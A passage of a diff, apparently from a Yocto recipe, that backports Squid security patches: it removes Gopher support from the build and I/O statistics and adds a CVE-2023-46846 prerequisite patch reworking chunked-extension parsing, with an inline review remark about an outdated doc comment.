b/src/HttpMsg.h +@@ -38,7 +38,6 @@ public: + srcFtp = 1 << (16 + 1), ///< ftp_port or FTP server + srcIcap = 1 << (16 + 2), ///< traditional ICAP service without encryption + srcEcap = 1 << (16 + 3), ///< eCAP service that uses insecure libraries/daemons +- srcGopher = 1 << (16 + 14), ///< Gopher server + srcWhois = 1 << (16 + 15), ///< Whois server + srcUnsafe = 0xFFFF0000, ///< Unsafe sources mask + srcSafe = 0x0000FFFF ///< Safe sources mask +--- a/src/mgr/IoAction.cc ++++ b/src/mgr/IoAction.cc +@@ -35,9 +35,6 @@ Mgr::IoActionData::operator += (const Io + ftp_reads += stats.ftp_reads; + for (int i = 0; i < IoStats::histSize; ++i) + ftp_read_hist[i] += stats.ftp_read_hist[i]; +- gopher_reads += stats.gopher_reads; +- for (int i = 0; i < IoStats::histSize; ++i) +- gopher_read_hist[i] += stats.gopher_read_hist[i]; + + return *this; + } +--- a/src/mgr/IoAction.h ++++ b/src/mgr/IoAction.h +@@ -27,10 +27,8 @@ public: + public: + double http_reads; 
+ double ftp_reads; +- double gopher_reads; + double http_read_hist[IoStats::histSize]; + double ftp_read_hist[IoStats::histSize]; +- double gopher_read_hist[IoStats::histSize]; + }; + + /// implement aggregated 'io' action +--- a/src/stat.cc ++++ b/src/stat.cc +@@ -206,12 +206,6 @@ GetIoStats(Mgr::IoActionData& stats) + for (i = 0; i < IoStats::histSize; ++i) { + stats.ftp_read_hist[i] = IOStats.Ftp.read_hist[i]; + } +- +- stats.gopher_reads = IOStats.Gopher.reads; +- +- for (i = 0; i < IoStats::histSize; ++i) { +- stats.gopher_read_hist[i] = IOStats.Gopher.read_hist[i]; +- } + } + + void +@@ -245,19 +239,6 @@ DumpIoStats(Mgr::IoActionData& stats, St + } + + storeAppendPrintf(sentry, "\n"); +- storeAppendPrintf(sentry, "Gopher I/O\n"); +- storeAppendPrintf(sentry, "number of reads: %.0f\n", stats.gopher_reads); +- storeAppendPrintf(sentry, "Read Histogram:\n"); +- +- for (i = 0; i < IoStats::histSize; ++i) { +- storeAppendPrintf(sentry, "%5d-%5d: %9.0f %2.0f%%\n", +- i ? (1 << (i - 1)) + 1 : 1, +- 1 << i, +- stats.gopher_read_hist[i], +- Math::doublePercent(stats.gopher_read_hist[i], stats.gopher_reads)); +- } +- +- storeAppendPrintf(sentry, "\n"); + } + + static const char * +--- a/src/Makefile.in ++++ b/src/Makefile.in +@@ -263,7 +263,7 @@ am__squid_SOURCES_DIST = AclRegs.cc Auth + ExternalACL.h ExternalACLEntry.cc ExternalACLEntry.h \ + FadingCounter.h FadingCounter.cc fatal.h fatal.cc fd.h fd.cc \ + fde.cc fde.h FileMap.h filemap.cc fqdncache.h fqdncache.cc \ +- FwdState.cc FwdState.h Generic.h globals.h gopher.h gopher.cc \ ++ FwdState.cc FwdState.h Generic.h globals.h \ + helper.cc helper.h hier_code.h HierarchyLogEntry.h htcp.cc \ + htcp.h http.cc http.h HttpHeaderFieldStat.h HttpHdrCc.h \ + HttpHdrCc.cc HttpHdrCc.cci HttpHdrRange.cc HttpHdrSc.cc \ +@@ -352,7 +352,7 @@ am_squid_OBJECTS = $(am__objects_1) Acce + EventLoop.$(OBJEXT) external_acl.$(OBJEXT) \ + ExternalACLEntry.$(OBJEXT) FadingCounter.$(OBJEXT) \ + fatal.$(OBJEXT) fd.$(OBJEXT) fde.$(OBJEXT) 
filemap.$(OBJEXT) \ +- fqdncache.$(OBJEXT) FwdState.$(OBJEXT) gopher.$(OBJEXT) \ ++ fqdncache.$(OBJEXT) FwdState.$(OBJEXT) \ + helper.$(OBJEXT) $(am__objects_5) http.$(OBJEXT) \ + HttpHdrCc.$(OBJEXT) HttpHdrRange.$(OBJEXT) HttpHdrSc.$(OBJEXT) \ + HttpHdrScTarget.$(OBJEXT) HttpHdrContRange.$(OBJEXT) \ +@@ -539,7 +539,7 @@ am__tests_testCacheManager_SOURCES_DIST + tests/stub_ETag.cc event.cc external_acl.cc \ + ExternalACLEntry.cc fatal.h tests/stub_fatal.cc fd.h fd.cc \ + fde.cc FileMap.h filemap.cc fqdncache.h fqdncache.cc \ +- FwdState.cc FwdState.h gopher.h gopher.cc hier_code.h \ ++ FwdState.cc FwdState.h hier_code.h \ + helper.cc htcp.cc htcp.h http.cc HttpBody.h HttpBody.cc \ + HttpHeader.h HttpHeader.cc HttpHeaderFieldInfo.h \ + HttpHeaderTools.h HttpHeaderTools.cc HttpHeaderFieldStat.h \ +@@ -594,7 +594,7 @@ am_tests_testCacheManager_OBJECTS = Acce + event.$(OBJEXT) external_acl.$(OBJEXT) \ + ExternalACLEntry.$(OBJEXT) tests/stub_fatal.$(OBJEXT) \ + fd.$(OBJEXT) fde.$(OBJEXT) filemap.$(OBJEXT) \ +- fqdncache.$(OBJEXT) FwdState.$(OBJEXT) gopher.$(OBJEXT) \ ++ fqdncache.$(OBJEXT) FwdState.$(OBJEXT) \ + helper.$(OBJEXT) $(am__objects_5) http.$(OBJEXT) \ + HttpBody.$(OBJEXT) HttpHeader.$(OBJEXT) \ + HttpHeaderTools.$(OBJEXT) HttpHdrCc.$(OBJEXT) \ +@@ -838,7 +838,7 @@ am__tests_testEvent_SOURCES_DIST = Acces + EventLoop.h EventLoop.cc external_acl.cc ExternalACLEntry.cc \ + FadingCounter.cc fatal.h tests/stub_fatal.cc fd.h fd.cc fde.cc \ + FileMap.h filemap.cc fqdncache.h fqdncache.cc FwdState.cc \ +- FwdState.h gopher.h gopher.cc helper.cc hier_code.h htcp.cc \ ++ FwdState.h helper.cc hier_code.h htcp.cc \ + htcp.h http.cc HttpBody.h HttpBody.cc \ + tests/stub_HttpControlMsg.cc HttpHeader.h HttpHeader.cc \ + HttpHeaderFieldInfo.h HttpHeaderTools.h HttpHeaderTools.cc \ +@@ -891,7 +891,7 @@ am_tests_testEvent_OBJECTS = AccessLogEn + external_acl.$(OBJEXT) ExternalACLEntry.$(OBJEXT) \ + FadingCounter.$(OBJEXT) tests/stub_fatal.$(OBJEXT) \ + fd.$(OBJEXT) 
fde.$(OBJEXT) filemap.$(OBJEXT) \ +- fqdncache.$(OBJEXT) FwdState.$(OBJEXT) gopher.$(OBJEXT) \ ++ fqdncache.$(OBJEXT) FwdState.$(OBJEXT) \ + helper.$(OBJEXT) $(am__objects_5) http.$(OBJEXT) \ + HttpBody.$(OBJEXT) tests/stub_HttpControlMsg.$(OBJEXT) \ + HttpHeader.$(OBJEXT) HttpHeaderTools.$(OBJEXT) \ +@@ -975,8 +975,8 @@ am__tests_testEventLoop_SOURCES_DIST = A + tests/stub_ETag.cc EventLoop.h EventLoop.cc event.cc \ + external_acl.cc ExternalACLEntry.cc FadingCounter.cc fatal.h \ + tests/stub_fatal.cc fd.h fd.cc fde.cc FileMap.h filemap.cc \ +- fqdncache.h fqdncache.cc FwdState.cc FwdState.h gopher.h \ +- gopher.cc helper.cc hier_code.h htcp.cc htcp.h http.cc \ ++ fqdncache.h fqdncache.cc FwdState.cc FwdState.h \ ++ helper.cc hier_code.h htcp.cc htcp.h http.cc \ + HttpBody.h HttpBody.cc tests/stub_HttpControlMsg.cc \ + HttpHeader.h HttpHeader.cc HttpHeaderFieldInfo.h \ + HttpHeaderTools.h HttpHeaderTools.cc HttpHeaderFieldStat.h \ +@@ -1029,7 +1029,7 @@ am_tests_testEventLoop_OBJECTS = AccessL + external_acl.$(OBJEXT) ExternalACLEntry.$(OBJEXT) \ + FadingCounter.$(OBJEXT) tests/stub_fatal.$(OBJEXT) \ + fd.$(OBJEXT) fde.$(OBJEXT) filemap.$(OBJEXT) \ +- fqdncache.$(OBJEXT) FwdState.$(OBJEXT) gopher.$(OBJEXT) \ ++ fqdncache.$(OBJEXT) FwdState.$(OBJEXT) \ + helper.$(OBJEXT) $(am__objects_5) http.$(OBJEXT) \ + HttpBody.$(OBJEXT) tests/stub_HttpControlMsg.$(OBJEXT) \ + HttpHeader.$(OBJEXT) HttpHeaderTools.$(OBJEXT) \ +@@ -1187,7 +1187,7 @@ am__tests_testHttpRequest_SOURCES_DIST = + fs_io.cc dlink.h dlink.cc dns_internal.cc errorpage.cc \ + tests/stub_ETag.cc external_acl.cc ExternalACLEntry.cc fatal.h \ + tests/stub_fatal.cc fd.h fd.cc fde.cc fqdncache.h fqdncache.cc \ +- FwdState.cc FwdState.h gopher.h gopher.cc helper.cc \ ++ FwdState.cc FwdState.h helper.cc \ + hier_code.h htcp.cc htcp.h http.cc HttpBody.h HttpBody.cc \ + tests/stub_HttpControlMsg.cc HttpHeader.h HttpHeader.cc \ + HttpHeaderFieldInfo.h HttpHeaderTools.h HttpHeaderTools.cc \ +@@ -1243,7 +1243,7 @@ 
am_tests_testHttpRequest_OBJECTS = Acces + $(am__objects_4) errorpage.$(OBJEXT) tests/stub_ETag.$(OBJEXT) \ + external_acl.$(OBJEXT) ExternalACLEntry.$(OBJEXT) \ + tests/stub_fatal.$(OBJEXT) fd.$(OBJEXT) fde.$(OBJEXT) \ +- fqdncache.$(OBJEXT) FwdState.$(OBJEXT) gopher.$(OBJEXT) \ ++ fqdncache.$(OBJEXT) FwdState.$(OBJEXT) \ + helper.$(OBJEXT) $(am__objects_5) http.$(OBJEXT) \ + HttpBody.$(OBJEXT) tests/stub_HttpControlMsg.$(OBJEXT) \ + HttpHeader.$(OBJEXT) HttpHeaderTools.$(OBJEXT) \ +@@ -1670,8 +1670,8 @@ am__tests_testURL_SOURCES_DIST = AccessL + fs_io.cc dlink.h dlink.cc dns_internal.cc errorpage.cc ETag.cc \ + event.cc external_acl.cc ExternalACLEntry.cc fatal.h \ + tests/stub_fatal.cc fd.h fd.cc fde.cc FileMap.h filemap.cc \ +- fqdncache.h fqdncache.cc FwdState.cc FwdState.h gopher.h \ +- gopher.cc helper.cc hier_code.h htcp.cc htcp.h http.cc \ ++ fqdncache.h fqdncache.cc FwdState.cc FwdState.h \ ++ helper.cc hier_code.h htcp.cc htcp.h http.cc \ + HttpBody.h HttpBody.cc tests/stub_HttpControlMsg.cc \ + HttpHeaderFieldStat.h HttpHdrCc.h HttpHdrCc.cc HttpHdrCc.cci \ + HttpHdrContRange.cc HttpHdrRange.cc HttpHdrSc.cc \ +@@ -1725,7 +1725,7 @@ am_tests_testURL_OBJECTS = AccessLogEntr + event.$(OBJEXT) external_acl.$(OBJEXT) \ + ExternalACLEntry.$(OBJEXT) tests/stub_fatal.$(OBJEXT) \ + fd.$(OBJEXT) fde.$(OBJEXT) filemap.$(OBJEXT) \ +- fqdncache.$(OBJEXT) FwdState.$(OBJEXT) gopher.$(OBJEXT) \ ++ fqdncache.$(OBJEXT) FwdState.$(OBJEXT) \ + helper.$(OBJEXT) $(am__objects_5) http.$(OBJEXT) \ + HttpBody.$(OBJEXT) tests/stub_HttpControlMsg.$(OBJEXT) \ + HttpHdrCc.$(OBJEXT) HttpHdrContRange.$(OBJEXT) \ +@@ -1925,8 +1925,8 @@ am__tests_test_http_range_SOURCES_DIST = + dns_internal.cc errorpage.cc tests/stub_ETag.cc event.cc \ + FadingCounter.cc fatal.h tests/stub_libauth.cc \ + tests/stub_fatal.cc fd.h fd.cc fde.cc FileMap.h filemap.cc \ +- fqdncache.h fqdncache.cc FwdState.cc FwdState.h gopher.h \ +- gopher.cc helper.cc hier_code.h htcp.cc htcp.h http.cc \ ++ fqdncache.h 
fqdncache.cc FwdState.cc FwdState.h \ ++ helper.cc hier_code.h htcp.cc htcp.h http.cc \ + HttpBody.h HttpBody.cc tests/stub_HttpControlMsg.cc \ + HttpHeaderFieldStat.h HttpHdrCc.h HttpHdrCc.cc HttpHdrCc.cci \ + HttpHdrContRange.cc HttpHdrRange.cc HttpHdrSc.cc \ +@@ -1979,7 +1979,7 @@ am_tests_test_http_range_OBJECTS = Acces + FadingCounter.$(OBJEXT) tests/stub_libauth.$(OBJEXT) \ + tests/stub_fatal.$(OBJEXT) fd.$(OBJEXT) fde.$(OBJEXT) \ + filemap.$(OBJEXT) fqdncache.$(OBJEXT) FwdState.$(OBJEXT) \ +- gopher.$(OBJEXT) helper.$(OBJEXT) $(am__objects_5) \ ++ helper.$(OBJEXT) $(am__objects_5) \ + http.$(OBJEXT) HttpBody.$(OBJEXT) \ + tests/stub_HttpControlMsg.$(OBJEXT) HttpHdrCc.$(OBJEXT) \ + HttpHdrContRange.$(OBJEXT) HttpHdrRange.$(OBJEXT) \ +@@ -2131,7 +2131,7 @@ am__depfiles_remade = ./$(DEPDIR)/Access + ./$(DEPDIR)/external_acl.Po ./$(DEPDIR)/fatal.Po \ + ./$(DEPDIR)/fd.Po ./$(DEPDIR)/fde.Po ./$(DEPDIR)/filemap.Po \ + ./$(DEPDIR)/fqdncache.Po ./$(DEPDIR)/fs_io.Po \ +- ./$(DEPDIR)/globals.Po ./$(DEPDIR)/gopher.Po \ ++ ./$(DEPDIR)/globals.Po \ + ./$(DEPDIR)/helper.Po ./$(DEPDIR)/hier_code.Po \ + ./$(DEPDIR)/htcp.Po ./$(DEPDIR)/http.Po \ + ./$(DEPDIR)/icp_opcode.Po ./$(DEPDIR)/icp_v2.Po \ +@@ -3043,7 +3043,7 @@ squid_SOURCES = $(ACL_REGISTRATION_SOURC + ExternalACL.h ExternalACLEntry.cc ExternalACLEntry.h \ + FadingCounter.h FadingCounter.cc fatal.h fatal.cc fd.h fd.cc \ + fde.cc fde.h FileMap.h filemap.cc fqdncache.h fqdncache.cc \ +- FwdState.cc FwdState.h Generic.h globals.h gopher.h gopher.cc \ ++ FwdState.cc FwdState.h Generic.h globals.h \ + helper.cc helper.h hier_code.h HierarchyLogEntry.h \ + $(HTCPSOURCE) http.cc http.h HttpHeaderFieldStat.h HttpHdrCc.h \ + HttpHdrCc.cc HttpHdrCc.cci HttpHdrRange.cc HttpHdrSc.cc \ +@@ -3708,8 +3708,6 @@ tests_testCacheManager_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + hier_code.h \ + helper.cc \ + $(HTCPSOURCE) \ +@@ -4134,8 +4132,6 @@ tests_testEvent_SOURCES = \ + fqdncache.cc 
\ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -4371,8 +4367,6 @@ tests_testEventLoop_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -4604,8 +4598,6 @@ tests_test_http_range_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -4924,8 +4916,6 @@ tests_testHttpRequest_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -5777,8 +5767,6 @@ tests_testURL_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -6823,7 +6811,6 @@ distclean-compile: + @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/fqdncache.Po@am__quote@ # am--include-marker + @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/fs_io.Po@am__quote@ # am--include-marker + @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/globals.Po@am__quote@ # am--include-marker +-@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/gopher.Po@am__quote@ # am--include-marker + @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/helper.Po@am__quote@ # am--include-marker + @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/hier_code.Po@am__quote@ # am--include-marker + @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/htcp.Po@am__quote@ # am--include-marker +@@ -7804,7 +7791,6 @@ distclean: distclean-recursive + -rm -f ./$(DEPDIR)/fqdncache.Po + -rm -f ./$(DEPDIR)/fs_io.Po + -rm -f ./$(DEPDIR)/globals.Po +- -rm -f ./$(DEPDIR)/gopher.Po + -rm -f ./$(DEPDIR)/helper.Po + -rm -f ./$(DEPDIR)/hier_code.Po + -rm -f ./$(DEPDIR)/htcp.Po +@@ -8129,7 +8115,6 @@ maintainer-clean: maintainer-clean-recur + -rm -f ./$(DEPDIR)/fqdncache.Po + -rm -f ./$(DEPDIR)/fs_io.Po + -rm -f ./$(DEPDIR)/globals.Po +- -rm -f ./$(DEPDIR)/gopher.Po + -rm 
-f ./$(DEPDIR)/helper.Po + -rm -f ./$(DEPDIR)/hier_code.Po + -rm -f ./$(DEPDIR)/htcp.Po diff --git a/meta-networking/recipes-daemons/squid/files/CVE-2023-46846-pre1.patch b/meta-networking/recipes-daemons/squid/files/CVE-2023-46846-pre1.patch new file mode 100644 index 0000000000..5b4e370d49 --- /dev/null +++ b/meta-networking/recipes-daemons/squid/files/CVE-2023-46846-pre1.patch 
@@ -0,0 +1,1154 @@
+Backport of:
+
+From 417da4006cf5c97d44e74431b816fc58fec9e270 Mon Sep 17 00:00:00 2001
+From: Eduard Bagdasaryan <eduard.bagdasaryan@measurement-factory.com>
+Date: Mon, 18 Mar 2019 17:48:21 +0000
+Subject: [PATCH] Fix incremental parsing of chunked quoted extensions (#310)
+
+Before this change, incremental parsing of quoted chunked extensions
+was broken for two reasons:
+
+* Http::One::Parser::skipLineTerminator() unexpectedly threw after
+ partially received quoted chunk extension value.
+
+* When Http::One::Tokenizer was unable to parse a quoted extension,
+ it incorrectly restored the input buffer to the beginning of the
+ extension value (instead of the extension itself), thus making
+ further incremental parsing iterations impossible.
+
+IMO, the reason for this problem was that Http::One::Tokenizer::qdText()
+could not distinguish two cases (returning false in both):
+
+* the end of the quoted string not yet reached
+
+* an input error, e.g., wrong/unexpected character
+
+A possible approach could be to improve Http::One::Tokenizer, making it
+aware about "needs more data" state. However, to be acceptable,
+these improvements should be done in the base Parser::Tokenizer
+class instead. These changes seem to be non-trivial and could be
+done separately and later.
+
+Another approach, used here, is to simplify the complex and error-prone
+chunked extensions parsing algorithm, fixing incremental parsing bugs
+and still parse incrementally in almost all cases. The performance
+regression could be expected only in relatively rare cases of partially
+received or malformed extensions.
+
+Also:
+* fixed parsing of partial use-original-body extension values
+* do not treat an invalid use-original-body as an unknown extension
+* optimization: parse use-original-body extension only in ICAP context
+ (i.e., where it is expected)
+* improvement: added a new API to TeChunkedParser to specify known
+ chunked extensions list
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/squid/tree/debian/patches/CVE-2023-46846-pre1.patch?h=ubuntu/focal-security&id=9ccd217ca9428c9a6597e9310a99552026b245fa
+Upstream commit https://github.com/squid-cache/squid/commit/417da4006cf5c97d44e74431b816fc58fec9e270]
+CVE: CVE-2023-46846 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/adaptation/icap/ModXact.cc | 21 ++++-
+ src/adaptation/icap/ModXact.h | 20 +++++
+ src/http/one/Parser.cc | 35 ++++----
+ src/http/one/Parser.h | 10 ++-
+ src/http/one/RequestParser.cc | 16 ++--
+ src/http/one/RequestParser.h | 8 +-
+ src/http/one/ResponseParser.cc | 17 ++--
+ src/http/one/ResponseParser.h | 2 +-
+ src/http/one/TeChunkedParser.cc | 139 ++++++++++++++++++--------------
+ src/http/one/TeChunkedParser.h | 41 ++++++++--
+ src/http/one/Tokenizer.cc | 104 ++++++++++++------------
+ src/http/one/Tokenizer.h | 89 ++++++++------------
+ src/http/one/forward.h | 3 +
+ src/parser/BinaryTokenizer.h | 3 +-
+ src/parser/Makefile.am | 1 +
+ src/parser/Tokenizer.cc | 40 +++++++++
+ src/parser/Tokenizer.h | 13 +++
+ src/parser/forward.h | 22 +++++
+ 18 files changed, 364 insertions(+), 220 deletions(-)
+ create mode 100644 src/parser/forward.h
+
+--- a/src/adaptation/icap/ModXact.cc
++++ b/src/adaptation/icap/ModXact.cc
+@@ -25,12 +25,13 @@
+ #include "comm.h"
+ #include "comm/Connection.h"
+ #include "err_detail_type.h"
+-#include "http/one/TeChunkedParser.h"
+ #include "HttpHeaderTools.h"
+ #include "HttpMsg.h"
+ #include "HttpReply.h"
+ #include "HttpRequest.h"
+ #include "MasterXaction.h"
++#include "parser/Tokenizer.h"
++#include "sbuf/Stream.h" + #include "SquidTime.h" + + // flow and terminology: +@@ -44,6 +45,8 @@ CBDATA_NAMESPACED_CLASS_INIT(Adaptation: + + static const size_t TheBackupLimit = BodyPipe::MaxCapacity; + ++const SBuf Adaptation::Icap::ChunkExtensionValueParser::UseOriginalBodyName("use-original-body"); ++ + Adaptation::Icap::ModXact::State::State() + { + memset(this, 0, sizeof(*this)); +@@ -1108,6 +1111,7 @@ void Adaptation::Icap::ModXact::decideOn + state.parsing = State::psBody; + replyHttpBodySize = 0; + bodyParser = new Http1::TeChunkedParser; ++ bodyParser->parseExtensionValuesWith(&extensionParser); + makeAdaptedBodyPipe("adapted response from the ICAP server"); + Must(state.sending == State::sendingAdapted); + } else { +@@ -1142,9 +1146,8 @@ void Adaptation::Icap::ModXact::parseBod + } + + if (parsed) { +- if (state.readyForUob && bodyParser->useOriginBody >= 0) { +- prepPartialBodyEchoing( +- static_cast<uint64_t>(bodyParser->useOriginBody)); ++ if (state.readyForUob && extensionParser.sawUseOriginalBody()) { ++ prepPartialBodyEchoing(extensionParser.useOriginalBody()); + stopParsing(); + return; + } +@@ -2014,3 +2017,14 @@ void Adaptation::Icap::ModXactLauncher:: + } + } + ++void ++Adaptation::Icap::ChunkExtensionValueParser::parse(Tokenizer &tok, const SBuf &extName) ++{ ++ if (extName == UseOriginalBodyName) { ++ useOriginalBody_ = tok.udec64("use-original-body"); ++ assert(useOriginalBody_ >= 0); ++ } else { ++ Ignore(tok, extName); ++ } ++} ++ +--- a/src/adaptation/icap/ModXact.h ++++ b/src/adaptation/icap/ModXact.h +@@ -15,6 +15,7 @@ + #include "adaptation/icap/Xaction.h" + #include "BodyPipe.h" + #include "http/one/forward.h" ++#include "http/one/TeChunkedParser.h" + + /* + * ICAPModXact implements ICAP REQMOD and RESPMOD transaction using +@@ -105,6 +106,23 @@ private: + enum State { stDisabled, stWriting, stIeof, stDone } theState; + }; + ++/// handles ICAP-specific chunk extensions supported by Squid ++class ChunkExtensionValueParser: public 
Http1::ChunkExtensionValueParser ++{ ++public: ++ /* Http1::ChunkExtensionValueParser API */ ++ virtual void parse(Tokenizer &tok, const SBuf &extName) override; ++ ++ bool sawUseOriginalBody() const { return useOriginalBody_ >= 0; } ++ uint64_t useOriginalBody() const { assert(sawUseOriginalBody()); return static_cast<uint64_t>(useOriginalBody_); } ++ ++private: ++ static const SBuf UseOriginalBodyName; ++ ++ /// the value of the parsed use-original-body chunk extension (or -1) ++ int64_t useOriginalBody_ = -1; ++}; ++ + class ModXact: public Xaction, public BodyProducer, public BodyConsumer + { + CBDATA_CLASS(ModXact); +@@ -270,6 +288,8 @@ private: + + int adaptHistoryId; ///< adaptation history slot reservation + ++ ChunkExtensionValueParser extensionParser; ++ + class State + { + +--- a/src/http/one/Parser.cc ++++ b/src/http/one/Parser.cc +@@ -7,10 +7,11 @@ + */ + + #include "squid.h" ++#include "base/CharacterSet.h" + #include "Debug.h" + #include "http/one/Parser.h" +-#include "http/one/Tokenizer.h" + #include "mime_header.h" ++#include "parser/Tokenizer.h" + #include "SquidConfig.h" + + /// RFC 7230 section 2.6 - 7 magic octets +@@ -61,20 +62,19 @@ Http::One::Parser::DelimiterCharacters() + RelaxedDelimiterCharacters() : CharacterSet::SP; + } + +-bool +-Http::One::Parser::skipLineTerminator(Http1::Tokenizer &tok) const ++void ++Http::One::Parser::skipLineTerminator(Tokenizer &tok) const + { + if (tok.skip(Http1::CrLf())) +- return true; ++ return; + + if (Config.onoff.relaxed_header_parser && tok.skipOne(CharacterSet::LF)) +- return true; ++ return; + + if (tok.atEnd() || (tok.remaining().length() == 1 && tok.remaining().at(0) == '\r')) +- return false; // need more data ++ throw InsufficientInput(); + + throw TexcHere("garbage instead of CRLF line terminator"); +- return false; // unreachable, but make naive compilers happy + } + + /// all characters except the LF line terminator +@@ -102,7 +102,7 @@ LineCharacters() + void + 
Http::One::Parser::cleanMimePrefix() + { +- Http1::Tokenizer tok(mimeHeaderBlock_); ++ Tokenizer tok(mimeHeaderBlock_); + while (tok.skipOne(RelaxedDelimiterCharacters())) { + (void)tok.skipAll(LineCharacters()); // optional line content + // LF terminator is required. +@@ -137,7 +137,7 @@ Http::One::Parser::cleanMimePrefix() + void + Http::One::Parser::unfoldMime() + { +- Http1::Tokenizer tok(mimeHeaderBlock_); ++ Tokenizer tok(mimeHeaderBlock_); + const auto szLimit = mimeHeaderBlock_.length(); + mimeHeaderBlock_.clear(); + // prevent the mime sender being able to make append() realloc/grow multiple times. +@@ -228,7 +228,7 @@ Http::One::Parser::getHostHeaderField() + debugs(25, 5, "looking for " << name); + + // while we can find more LF in the SBuf +- Http1::Tokenizer tok(mimeHeaderBlock_); ++ Tokenizer tok(mimeHeaderBlock_); + SBuf p; + + while (tok.prefix(p, LineCharacters())) { +@@ -250,7 +250,7 @@ Http::One::Parser::getHostHeaderField() + p.consume(namelen + 1); + + // TODO: optimize SBuf::trim to take CharacterSet directly +- Http1::Tokenizer t(p); ++ Tokenizer t(p); + t.skipAll(CharacterSet::WSP); + p = t.remaining(); + +@@ -278,10 +278,15 @@ Http::One::ErrorLevel() + } + + // BWS = *( SP / HTAB ) ; WhitespaceCharacters() may relax this RFC 7230 rule +-bool +-Http::One::ParseBws(Tokenizer &tok) ++void ++Http::One::ParseBws(Parser::Tokenizer &tok) + { +- if (const auto count = tok.skipAll(Parser::WhitespaceCharacters())) { ++ const auto count = tok.skipAll(Parser::WhitespaceCharacters()); ++ ++ if (tok.atEnd()) ++ throw InsufficientInput(); // even if count is positive ++ ++ if (count) { + // Generating BWS is a MUST-level violation so warn about it as needed. 
+ debugs(33, ErrorLevel(), "found " << count << " BWS octets"); + // RFC 7230 says we MUST parse BWS, so we fall through even if +@@ -289,6 +294,6 @@ Http::One::ParseBws(Tokenizer &tok) + } + // else we successfully "parsed" an empty BWS sequence + +- return true; ++ // success: no more BWS characters expected + } + +--- a/src/http/one/Parser.h ++++ b/src/http/one/Parser.h +@@ -12,6 +12,7 @@ + #include "anyp/ProtocolVersion.h" + #include "http/one/forward.h" + #include "http/StatusCode.h" ++#include "parser/forward.h" + #include "sbuf/SBuf.h" + + namespace Http { +@@ -40,6 +41,7 @@ class Parser : public RefCountable + { + public: + typedef SBuf::size_type size_type; ++ typedef ::Parser::Tokenizer Tokenizer; + + Parser() : parseStatusCode(Http::scNone), parsingStage_(HTTP_PARSE_NONE), hackExpectsMime_(false) {} + virtual ~Parser() {} +@@ -118,11 +120,11 @@ protected: + * detect and skip the CRLF or (if tolerant) LF line terminator + * consume from the tokenizer. + * +- * throws if non-terminator is detected. ++ * \throws exception on bad or InsuffientInput. + * \retval true only if line terminator found. + * \retval false incomplete or missing line terminator, need more data. + */ +- bool skipLineTerminator(Http1::Tokenizer &tok) const; ++ void skipLineTerminator(Tokenizer &) const; + + /** + * Scan to find the mime headers block for current message. 
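Review bot: The doc comment above `skipLineTerminator()` in the Parser.h hunk at `@@ -118,11 +120,11 @@` still carries `\retval true` and `\retval false`, although the function now returns `void`, and it misspells the exception as `InsuffientInput`. After this change callers can only tell "need more data" from malformed input by exception type, so the header should state that contract. I would replace the `\throws` line and both `\retval` lines with `\throws InsufficientInput when the terminator may still arrive` and `\throws an exception on garbage instead of a CRLF line terminator`. The enclosing class starts and ends outside the hunk.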
+@@ -159,8 +161,8 @@ private: + }; + + /// skips and, if needed, warns about RFC 7230 BWS ("bad" whitespace) +-/// \returns true (always; unlike all the skip*() functions) +-bool ParseBws(Tokenizer &tok); ++/// \throws InsufficientInput when the end of BWS cannot be confirmed ++void ParseBws(Parser::Tokenizer &); + + /// the right debugs() level for logging HTTP violation messages + int ErrorLevel(); +--- a/src/http/one/RequestParser.cc ++++ b/src/http/one/RequestParser.cc +@@ -9,8 +9,8 @@ + #include "squid.h" + #include "Debug.h" + #include "http/one/RequestParser.h" +-#include "http/one/Tokenizer.h" + #include "http/ProtocolVersion.h" ++#include "parser/Tokenizer.h" + #include "profiler/Profiler.h" + #include "SquidConfig.h" + +@@ -64,7 +64,7 @@ Http::One::RequestParser::skipGarbageLin + * RFC 7230 section 2.6, 3.1 and 3.5 + */ + bool +-Http::One::RequestParser::parseMethodField(Http1::Tokenizer &tok) ++Http::One::RequestParser::parseMethodField(Tokenizer &tok) + { + // method field is a sequence of TCHAR. + // Limit to 32 characters to prevent overly long sequences of non-HTTP +@@ -145,7 +145,7 @@ Http::One::RequestParser::RequestTargetC + } + + bool +-Http::One::RequestParser::parseUriField(Http1::Tokenizer &tok) ++Http::One::RequestParser::parseUriField(Tokenizer &tok) + { + /* Arbitrary 64KB URI upper length limit. + * +@@ -178,7 +178,7 @@ Http::One::RequestParser::parseUriField( + } + + bool +-Http::One::RequestParser::parseHttpVersionField(Http1::Tokenizer &tok) ++Http::One::RequestParser::parseHttpVersionField(Tokenizer &tok) + { + static const SBuf http1p0("HTTP/1.0"); + static const SBuf http1p1("HTTP/1.1"); +@@ -253,7 +253,7 @@ Http::One::RequestParser::skipDelimiter( + + /// Parse CRs at the end of request-line, just before the terminating LF. 
